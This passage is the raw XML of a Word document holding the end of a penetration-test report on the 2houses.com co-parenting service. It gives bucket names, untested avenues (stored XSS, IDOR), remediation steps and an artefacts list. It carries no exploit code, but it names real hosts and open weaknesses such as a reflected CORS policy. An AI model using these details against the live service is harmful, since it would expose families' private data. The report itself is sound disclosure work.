          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to admin IPs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>LOW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-004 — S3 bucket name is predictable (but correctly private)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> all exist and are correctly configured private. Enumeration is possible but doesn't lead anywhere — bucket listings are properly disabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>BlockPublicAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on at the AWS account level. Verify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contents are not mistakenly prod data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="999999"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>What I didn't do (and why)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not probe the stored-XSS finding (F-006) end-to-end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it requires creating an event, which violates the "no new records, no trace" constraint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not enumerate `branding` values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the Devise form — might be interpreted as registration probing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not test IDOR on `/agenda/events.json?id=...`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — would involve reading another family's data if successful, which is contrary to the engagement rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not test the Dragonfly media URL signatures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for forgery — I'd need to replay a stale URL, and since all URLs observed include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, out-of-scope confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not fuzz password reset rate limits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — would require many requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not examine `my.2houses.com`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> beyond DNS — it didn't respond to HTTP from my client, possibly due to an IP-based access rule. Worth investigating in a follow-up engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Did not analyse the mobile apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — require IPA/APK, user didn't provide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended next steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This week:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix CORS policy on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com/api/v1/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (F-003).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies (F-001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Put </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> behind IP allowlist or Cloudflare Access (F-002).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This month:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Roll out CSP on all Rails hosts in report-only mode (F-007). Promote to enforce after a week of clean logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit every place </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>popoverContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and similar HTML-in-JSON fields are produced; switch to structured data where possible (F-006).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pull Mouseflow off the login / reset pages or drop it entirely; update the sub-processor list (F-005).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify and patch the WordPress backend (F-008).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phusion Passenger from 6.0.5 → latest 6.x; match </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Next engagement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Re-test F-003 with one authenticated POST from an attacker Origin to confirm exploitability end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Test F-006 in a dedicated test family.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Map </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>my.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (needs a working path in from a real browser + authenticated session).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mobile app review (static + dynamic).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Branding / white-label multi-tenant isolation testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate additional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/api/v1/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoints and check if CORS reflects on them too.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="999999"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/Users/marcokotrotsos/PERSONAL/reverse-engineer/2houses/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>outline.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — engagement plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>findings/FINDING-*.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — one per issue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>har/full-walkthrough.har</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — authenticated session capture (gitignored, 30 MB)</w:t>
